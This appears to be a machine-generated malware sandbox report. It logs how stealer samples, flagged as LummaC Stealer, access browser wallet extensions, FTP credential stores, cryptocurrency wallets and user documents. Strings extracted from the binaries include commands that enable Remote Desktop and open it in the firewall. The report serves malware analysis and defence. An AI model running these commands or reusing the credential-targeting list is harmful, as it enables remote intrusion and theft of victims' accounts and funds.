Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Directory queried: C:\Users\user\Documents Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 0516ff61af.exe PID: 8100, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 0516ff61af.exe PID: 8100, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: ed15fdf974.exe PID: 4564, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Contains functionality to start a terminal service
Source: abcebc1047.exe, 00000009.00000002.2515107176.00000000006A1000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: net start termservice
Source: abcebc1047.exe, 00000009.00000002.2515107176.00000000006A1000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: abcebc1047.exe, 00000009.00000000.2506063563.00000000006A1000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: net start termservice
Source: abcebc1047.exe, 00000009.00000000.2506063563.00000000006A1000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 0000000A.00000000.2513773917.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000A.00000000.2513773917.0000000000E81000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ 